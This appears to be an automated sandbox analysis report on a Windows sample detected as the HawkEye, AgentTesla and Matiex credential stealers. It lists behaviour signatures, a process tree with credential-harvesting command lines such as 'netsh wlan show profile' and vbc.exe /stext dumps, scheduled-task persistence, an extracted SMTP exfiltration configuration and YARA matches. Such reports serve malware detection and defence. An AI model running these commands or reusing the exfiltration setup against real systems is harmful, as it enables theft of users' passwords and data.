Play interactive tour

Edit tour

Analysis Report B6LNCKjOGt5EmFQ.exe

Overview

General Information

Sample Name:	B6LNCKjOGt5EmFQ.exe
Analysis ID:	339499
MD5:	80d255a6a5ec339e15d6fec3c0fef666
SHA1:	bca665ff5a6a7084df2d424c0ed7fff3e141acbc
SHA256:	3e48d983e3315501931c646f896a8189637f5b9d21c453b051cd17f2584ee3c4
Tags:	exeYahoo
Most interesting Screenshot:

Detection

HawkEye AgentTesla MailPassView Matiex

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected HawkEye Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Sigma detected: Scheduled temp file as task from temp location

Yara detected AgentTesla

Yara detected AntiVM_3

Yara detected HawkEye Keylogger

Yara detected MailPassView

Yara detected Matiex Keylogger

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

Allocates memory in foreign processes

Changes the view of files in windows explorer (hidden files and folders)

Contains functionality to log keystrokes (.Net Source)

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

May check the online IP address of the machine

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file access)

Uses netsh to modify the Windows network and firewall settings

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query network adapater information

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains strange resources

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w10x64

B6LNCKjOGt5EmFQ.exe (PID: 6076 cmdline: 'C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe' MD5: 80D255A6A5EC339E15D6FEC3C0FEF666)

schtasks.exe (PID: 4812 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TcVfsyyjYuQ' /XML 'C:\Users\user\AppData\Local\Temp\tmpDAC4.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

B6LNCKjOGt5EmFQ.exe (PID: 5640 cmdline: {path} MD5: 80D255A6A5EC339E15D6FEC3C0FEF666)

B6LNCKjOGt5EmFQ.exe (PID: 5336 cmdline: {path} MD5: 80D255A6A5EC339E15D6FEC3C0FEF666)

LOGO AND PICTURES.exe (PID: 6208 cmdline: 'C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe' 0 MD5: D9001138C5119D936B70BF77E136AFBE)

netsh.exe (PID: 6184 cmdline: 'netsh' wlan show profile MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)

conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Pictures.exe (PID: 6240 cmdline: 'C:\Users\user\AppData\Local\Temp\Pictures.exe' 0 MD5: 25146E9C5ECD498DD17BA01E6CFAEB24)

dw20.exe (PID: 6740 cmdline: dw20.exe -x -s 2184 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)

vbc.exe (PID: 6836 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)

vbc.exe (PID: 6848 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)

PO456724392021.exe (PID: 6292 cmdline: 'C:\Users\user\AppData\Local\Temp\PO456724392021.exe' 0 MD5: F38E2D474C075EFF35B4EF81FDACA650)

PO2345714382021.exe (PID: 6488 cmdline: 'C:\Users\user\AppData\Local\Temp\PO2345714382021.exe' 0 MD5: 9B79DE8E3AD21F14E71E55CFA6AE4727)

cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Threatname: Agenttesla

{"Username: ": "", "URL: ": "", "To: ": "sales01@seedwellresources.xyz", "ByHost: ": "smtp.privateemail.com:5874", "Password: ": "", "From: ": "sales01@seedwellresources.xyz"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\PO456724392021.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
C:\Users\user\AppData\Local\Temp\Pictures.exe	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8f7:$key: HawkEyeKeylogger 0x7db3b:$salt: 099u787978786 0x7bf38:$string1: HawkEye_Keylogger 0x7cd8b:$string1: HawkEye_Keylogger 0x7da9b:$string1: HawkEye_Keylogger 0x7c321:$string2: holdermail.txt 0x7c341:$string2: holdermail.txt 0x7c263:$string3: wallet.dat 0x7c27b:$string3: wallet.dat 0x7c291:$string3: wallet.dat 0x7d65f:$string4: Keylog Records 0x7d977:$string4: Keylog Records 0x7db93:$string5: do not script --> 0x7b8df:$string6: \pidloc.txt 0x7b96d:$string7: BSPLIT 0x7b97d:$string7: BSPLIT
C:\Users\user\AppData\Local\Temp\Pictures.exe	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
C:\Users\user\AppData\Local\Temp\Pictures.exe	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
C:\Users\user\AppData\Local\Temp\Pictures.exe	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
C:\Users\user\AppData\Local\Temp\Pictures.exe	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf90:$hawkstr1: HawkEye Keylogger 0x7cdd1:$hawkstr1: HawkEye Keylogger 0x7d100:$hawkstr1: HawkEye Keylogger 0x7d25b:$hawkstr1: HawkEye Keylogger 0x7d3be:$hawkstr1: HawkEye Keylogger 0x7d637:$hawkstr1: HawkEye Keylogger 0x7bb1e:$hawkstr2: Dear HawkEye Customers! 0x7d153:$hawkstr2: Dear HawkEye Customers! 0x7d2aa:$hawkstr2: Dear HawkEye Customers! 0x7d411:$hawkstr2: Dear HawkEye Customers! 0x7bc3f:$hawkstr3: HawkEye Logger Details:
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000003.291239624.0000000004451000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000014.00000002.308380033.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000003.283351079.000000000134C000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000008.00000003.289168879.0000000003E3C000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.604546258.0000000000DB2000.00000002.00020000.sdmp	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
00000008.00000003.287788541.00000000044BD000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000003.278201176.000000000138F000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.329671193.0000000003921000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0000000A.00000002.329671193.0000000003921000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b6f7:$key: HawkEyeKeylogger 0x7d93b:$salt: 099u787978786 0x7bd38:$string1: HawkEye_Keylogger 0x7cb8b:$string1: HawkEye_Keylogger 0x7d89b:$string1: HawkEye_Keylogger 0x7c121:$string2: holdermail.txt 0x7c141:$string2: holdermail.txt 0x7c063:$string3: wallet.dat 0x7c07b:$string3: wallet.dat 0x7c091:$string3: wallet.dat 0x7d45f:$string4: Keylog Records 0x7d777:$string4: Keylog Records 0x7d993:$string5: do not script --> 0x7b6df:$string6: \pidloc.txt 0x7b76d:$string7: BSPLIT 0x7b77d:$string7: BSPLIT
0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd90:$hawkstr1: HawkEye Keylogger 0x7cbd1:$hawkstr1: HawkEye Keylogger 0x7cf00:$hawkstr1: HawkEye Keylogger 0x7d05b:$hawkstr1: HawkEye Keylogger 0x7d1be:$hawkstr1: HawkEye Keylogger 0x7d437:$hawkstr1: HawkEye Keylogger 0x7b91e:$hawkstr2: Dear HawkEye Customers! 0x7cf53:$hawkstr2: Dear HawkEye Customers! 0x7d0aa:$hawkstr2: Dear HawkEye Customers! 0x7d211:$hawkstr2: Dear HawkEye Customers! 0x7ba3f:$hawkstr3: HawkEye Logger Details:
00000008.00000003.285048922.0000000004451000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0xeaf89:$key: HawkEyeKeylogger 0xed1cd:$salt: 099u787978786 0xeb5ca:$string1: HawkEye_Keylogger 0xec41d:$string1: HawkEye_Keylogger 0xed12d:$string1: HawkEye_Keylogger 0xeb9b3:$string2: holdermail.txt 0xeb9d3:$string2: holdermail.txt 0xeb8f5:$string3: wallet.dat 0xeb90d:$string3: wallet.dat 0xeb923:$string3: wallet.dat 0xeccf1:$string4: Keylog Records 0xed009:$string4: Keylog Records 0xed225:$string5: do not script --> 0xeaf71:$string6: \pidloc.txt 0xeafff:$string7: BSPLIT 0xeb00f:$string7: BSPLIT
00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0xeb622:$hawkstr1: HawkEye Keylogger 0xec463:$hawkstr1: HawkEye Keylogger 0xec792:$hawkstr1: HawkEye Keylogger 0xec8ed:$hawkstr1: HawkEye Keylogger 0xeca50:$hawkstr1: HawkEye Keylogger 0xeccc9:$hawkstr1: HawkEye Keylogger 0xeb1b0:$hawkstr2: Dear HawkEye Customers! 0xec7e5:$hawkstr2: Dear HawkEye Customers! 0xec93c:$hawkstr2: Dear HawkEye Customers! 0xecaa3:$hawkstr2: Dear HawkEye Customers! 0xeb2d1:$hawkstr3: HawkEye Logger Details:
00000009.00000000.281199501.0000000000DB2000.00000002.00020000.sdmp	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
0000000C.00000000.284660390.0000000000AB2000.00000002.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000003.278060140.0000000001324000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000010.00000000.287649744.00000000005D2000.00000002.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000003.287852153.0000000003DD1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.612763581.0000000002D81000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.612763581.0000000002D81000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b6f7:$key: HawkEyeKeylogger 0x7d93b:$salt: 099u787978786 0x7bd38:$string1: HawkEye_Keylogger 0x7cb8b:$string1: HawkEye_Keylogger 0x7d89b:$string1: HawkEye_Keylogger 0x7c121:$string2: holdermail.txt 0x7c141:$string2: holdermail.txt 0x7c063:$string3: wallet.dat 0x7c07b:$string3: wallet.dat 0x7c091:$string3: wallet.dat 0x7d45f:$string4: Keylog Records 0x7d777:$string4: Keylog Records 0x7d993:$string5: do not script --> 0x7b6df:$string6: \pidloc.txt 0x7b76d:$string7: BSPLIT 0x7b77d:$string7: BSPLIT
0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd90:$hawkstr1: HawkEye Keylogger 0x7cbd1:$hawkstr1: HawkEye Keylogger 0x7cf00:$hawkstr1: HawkEye Keylogger 0x7d05b:$hawkstr1: HawkEye Keylogger 0x7d1be:$hawkstr1: HawkEye Keylogger 0x7d437:$hawkstr1: HawkEye Keylogger 0x7b91e:$hawkstr2: Dear HawkEye Customers! 0x7cf53:$hawkstr2: Dear HawkEye Customers! 0x7d0aa:$hawkstr2: Dear HawkEye Customers! 0x7d211:$hawkstr2: Dear HawkEye Customers! 0x7ba3f:$hawkstr3: HawkEye Logger Details:
0000000C.00000002.604664953.0000000000AB2000.00000002.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000003.286730546.00000000044BD000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.612958072.0000000002DD2000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.612958072.0000000002DD2000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.327595878.000000000295F000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0000000A.00000002.327595878.000000000295F000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7078:$hawkstr1: HawkEye Keylogger 0x9468:$hawkstr1: HawkEye Keylogger 0xa1e0:$hawkstr1: HawkEye Keylogger 0xac00:$hawkstr1: HawkEye Keylogger 0xdc68:$hawkstr1: HawkEye Keylogger 0x6af0:$hawkstr2: Dear HawkEye Customers! 0x94cc:$hawkstr2: Dear HawkEye Customers! 0xa244:$hawkstr2: Dear HawkEye Customers! 0x6c22:$hawkstr3: HawkEye Logger Details:
00000000.00000002.280603529.000000000369E000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000013.00000002.301913637.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0xeb10d:$key: HawkEyeKeylogger 0xed351:$salt: 099u787978786 0xeb74e:$string1: HawkEye_Keylogger 0xec5a1:$string1: HawkEye_Keylogger 0xed2b1:$string1: HawkEye_Keylogger 0xebb37:$string2: holdermail.txt 0xebb57:$string2: holdermail.txt 0xeba79:$string3: wallet.dat 0xeba91:$string3: wallet.dat 0xebaa7:$string3: wallet.dat 0xece75:$string4: Keylog Records 0xed18d:$string4: Keylog Records 0xed3a9:$string5: do not script --> 0xeb0f5:$string6: \pidloc.txt 0xeb183:$string7: BSPLIT 0xeb193:$string7: BSPLIT
00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0xeb7a6:$hawkstr1: HawkEye Keylogger 0xec5e7:$hawkstr1: HawkEye Keylogger 0xec916:$hawkstr1: HawkEye Keylogger 0xeca71:$hawkstr1: HawkEye Keylogger 0xecbd4:$hawkstr1: HawkEye Keylogger 0xece4d:$hawkstr1: HawkEye Keylogger 0xeb334:$hawkstr2: Dear HawkEye Customers! 0xec969:$hawkstr2: Dear HawkEye Customers! 0xecac0:$hawkstr2: Dear HawkEye Customers! 0xecc27:$hawkstr2: Dear HawkEye Customers! 0xeb455:$hawkstr3: HawkEye Logger Details:
00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x631e45:$key: HawkEyeKeylogger 0x95ea85:$key: HawkEyeKeylogger 0x634089:$salt: 099u787978786 0x960cc9:$salt: 099u787978786 0x632486:$string1: HawkEye_Keylogger 0x6332d9:$string1: HawkEye_Keylogger 0x633fe9:$string1: HawkEye_Keylogger 0x95f0c6:$string1: HawkEye_Keylogger 0x95ff19:$string1: HawkEye_Keylogger 0x960c29:$string1: HawkEye_Keylogger 0x63286f:$string2: holdermail.txt 0x63288f:$string2: holdermail.txt 0x95f4af:$string2: holdermail.txt 0x95f4cf:$string2: holdermail.txt 0x6327b1:$string3: wallet.dat 0x6327c9:$string3: wallet.dat 0x6327df:$string3: wallet.dat 0x95f3f1:$string3: wallet.dat 0x95f409:$string3: wallet.dat 0x95f41f:$string3: wallet.dat 0x633bad:$string4: Keylog Records
00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x6324de:$hawkstr1: HawkEye Keylogger 0x63331f:$hawkstr1: HawkEye Keylogger 0x63364e:$hawkstr1: HawkEye Keylogger 0x6337a9:$hawkstr1: HawkEye Keylogger 0x63390c:$hawkstr1: HawkEye Keylogger 0x633b85:$hawkstr1: HawkEye Keylogger 0x95f11e:$hawkstr1: HawkEye Keylogger 0x95ff5f:$hawkstr1: HawkEye Keylogger 0x96028e:$hawkstr1: HawkEye Keylogger 0x9603e9:$hawkstr1: HawkEye Keylogger 0x96054c:$hawkstr1: HawkEye Keylogger 0x9607c5:$hawkstr1: HawkEye Keylogger 0x63206c:$hawkstr2: Dear HawkEye Customers! 0x6336a1:$hawkstr2: Dear HawkEye Customers! 0x6337f8:$hawkstr2: Dear HawkEye Customers! 0x63395f:$hawkstr2: Dear HawkEye Customers! 0x95ecac:$hawkstr2: Dear HawkEye Customers! 0x9602e1:$hawkstr2: Dear HawkEye Customers! 0x960438:$hawkstr2: Dear HawkEye Customers! 0x96059f:$hawkstr2: Dear HawkEye Customers! 0x63218d:$hawkstr3: HawkEye Logger Details:
Process Memory Space: Pictures.exe PID: 6240	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: Pictures.exe PID: 6240	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: Pictures.exe PID: 6240	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: LOGO AND PICTURES.exe PID: 6208	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
Process Memory Space: LOGO AND PICTURES.exe PID: 6208	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 5336	JoeSecurity_Matiex	Yara detected Matiex Keylogger	Joe Security
Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 5336	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 5336	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 5336	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 66 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
12.0.PO456724392021.exe.ab0000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
16.0.PO2345714382021.exe.5d0000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.PO456724392021.exe.ab0000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
19.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
10.0.Pictures.exe.150000.0.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8f7:$key: HawkEyeKeylogger 0x7db3b:$salt: 099u787978786 0x7bf38:$string1: HawkEye_Keylogger 0x7cd8b:$string1: HawkEye_Keylogger 0x7da9b:$string1: HawkEye_Keylogger 0x7c321:$string2: holdermail.txt 0x7c341:$string2: holdermail.txt 0x7c263:$string3: wallet.dat 0x7c27b:$string3: wallet.dat 0x7c291:$string3: wallet.dat 0x7d65f:$string4: Keylog Records 0x7d977:$string4: Keylog Records 0x7db93:$string5: do not script --> 0x7b8df:$string6: \pidloc.txt 0x7b96d:$string7: BSPLIT 0x7b97d:$string7: BSPLIT
10.0.Pictures.exe.150000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
10.0.Pictures.exe.150000.0.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
10.0.Pictures.exe.150000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
10.0.Pictures.exe.150000.0.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf90:$hawkstr1: HawkEye Keylogger 0x7cdd1:$hawkstr1: HawkEye Keylogger 0x7d100:$hawkstr1: HawkEye Keylogger 0x7d25b:$hawkstr1: HawkEye Keylogger 0x7d3be:$hawkstr1: HawkEye Keylogger 0x7d637:$hawkstr1: HawkEye Keylogger 0x7bb1e:$hawkstr2: Dear HawkEye Customers! 0x7d153:$hawkstr2: Dear HawkEye Customers! 0x7d2aa:$hawkstr2: Dear HawkEye Customers! 0x7d411:$hawkstr2: Dear HawkEye Customers! 0x7bc3f:$hawkstr3: HawkEye Logger Details:
19.2.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
20.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
10.2.Pictures.exe.150000.0.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8f7:$key: HawkEyeKeylogger 0x7db3b:$salt: 099u787978786 0x7bf38:$string1: HawkEye_Keylogger 0x7cd8b:$string1: HawkEye_Keylogger 0x7da9b:$string1: HawkEye_Keylogger 0x7c321:$string2: holdermail.txt 0x7c341:$string2: holdermail.txt 0x7c263:$string3: wallet.dat 0x7c27b:$string3: wallet.dat 0x7c291:$string3: wallet.dat 0x7d65f:$string4: Keylog Records 0x7d977:$string4: Keylog Records 0x7db93:$string5: do not script --> 0x7b8df:$string6: \pidloc.txt 0x7b96d:$string7: BSPLIT 0x7b97d:$string7: BSPLIT
10.2.Pictures.exe.150000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
10.2.Pictures.exe.150000.0.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
10.2.Pictures.exe.150000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
